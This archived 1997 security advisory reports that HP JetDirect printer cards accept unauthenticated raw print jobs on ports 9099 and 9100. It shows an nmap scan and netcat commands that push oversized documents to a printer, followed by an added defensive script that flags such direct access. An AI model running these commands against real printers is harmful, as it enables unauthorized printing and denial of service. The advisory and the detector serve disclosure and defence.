JetDirect printer card problem
|Description:||The JetDirect card with TCP/IP enabled will by default open high ports (9099 and 9100) which can be used to print arbitrary files|
|Author:||Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>|
|Compromise:||DoS Attack (send 500 page documents), or free printing if you have access to the printer in question|
|Vulnerable Systems:||Those using JetDirect with TCP/IP enabled and the default unrestricted connections. |
|Date:||4 October 1997 |
|Notes:||Cool! He used my |
Date: Sat, 4 Oct 1997 18:02:01 -0300
From: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
Subject: HP Laserjet 4M Plus DirectJet Problem

I don't know if this is a well-known HP printer problem, but
I've found no references to it in the bugtraq archives.

It is possible to bypass lpd and page accounting on an HP
PostScript printer attached to an ethernet card by sending PostScript
directly to tcp ports 9099 and 9100 from any machine over the network.

I've tested on an HP Laserjet 4M Plus DirectJet, connecting to
port 9099 or 9100 tcp and printing PostScript documents.

There is no way to tell the printer to accept connections only
from a range of valid IPs. Also, it is possible to telnet to the
printer and change the printer IP or disable logging. Protecting the
printer inside a firewall appears to be the only safe way.

Finding this kind of printer on a network is quite easy with a
good port scanner. It responds to ping and listens on tcp ports 23,
515, 9099 and 9100.

# nmap -P -s printer.foo.bar.org -p 23,515,9099,9100
Starting nmap V 1.25 by Fyodor (firstname.lastname@example.org, www.dhp.com/~fyodor/nmap/
Hint: The -v option notifies you of open ports as they are found.
Host printer.foo.bar.org (xx.yy.ww.zz) appears to be up ... good.
Open ports on printer.foo.bar.org (xx.yy.ww.zz):
Port Number Protocol Service
23 tcp telnet
515 tcp printer
9099 tcp unknown
9100 tcp unknown
To print a PostScript document just send it to port 9099 or
9100. Netcat will do:
$ nc printer.foo.bar.org 9099 < huge_document.ps
$ nc printer.foo.bar.org 9100 < huge_document.ps
Can anyone confirm this with other printers? I think the HP 5M is
also vulnerable, but I've not tested it.
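
An added example, not part of the original post or of the archive: a detection check that reads flow records and reports any host other than the approved print server that connects to a printer's raw print ports (9099, 9100) or telnet port (23), which is the lpd and page-accounting bypass described above. The record format, the addresses and the function names are assumptions made for this illustration.

```python
import ipaddress
from collections import defaultdict

# Ports the advisory reports open on the JetDirect card, and why each matters.
WATCHED = {9099: "raw print (no lpd accounting)",
           9100: "raw print (no lpd accounting)",
           23: "telnet configuration"}

# Constructed sample flow records, "time src dst dport bytes" (not real traffic).
SAMPLE_FLOWS = """\
1997-10-04T18:00:01 192.0.2.10 192.0.2.50 515 20480
1997-10-04T18:01:12 192.0.2.77 192.0.2.50 9100 7340032
1997-10-04T18:01:40 192.0.2.77 192.0.2.50 9099 7340032
1997-10-04T18:02:05 198.51.100.9 192.0.2.50 23 912
1997-10-04T18:03:30 192.0.2.10 192.0.2.50 9100 51200
1997-10-04T18:04:00 192.0.2.77 192.0.2.80 9100 1024
"""

def parse_flows(text):
    """Yield (time, src, dst, dport, bytes); reject malformed records."""
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split()
        if len(fields) != 5:
            raise ValueError(f"line {n}: expected 5 fields, got {len(fields)}")
        ts, src, dst, dport, size = fields
        yield (ts, ipaddress.ip_address(src), ipaddress.ip_address(dst),
               int(dport), int(size))

def direct_printer_access(text, printers, spoolers):
    """Total flows and bytes per (src, printer, port) that skipped the spooler."""
    printers = {ipaddress.ip_address(p) for p in printers}
    spoolers = {ipaddress.ip_address(s) for s in spoolers}
    totals = defaultdict(lambda: {"flows": 0, "bytes": 0})
    for _ts, src, dst, dport, size in parse_flows(text):
        if dst in printers and dport in WATCHED and src not in spoolers:
            key = (str(src), str(dst), dport)
            totals[key]["flows"] += 1
            totals[key]["bytes"] += size
    return dict(totals)

if __name__ == "__main__":
    # 192.0.2.50 is the printer, 192.0.2.10 the only approved print server.
    hits = direct_printer_access(SAMPLE_FLOWS, ["192.0.2.50"], ["192.0.2.10"])
    for (src, dst, dport), t in sorted(hits.items()):
        print(f"{src} -> {dst}:{dport} {WATCHED[dport]}: "
              f"{t['flows']} flow(s), {t['bytes']} bytes")
```

Large byte totals on 9099 or 9100 from a workstation correspond to the oversized-document case listed under Compromise.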
This page is part of Fyodor's exploit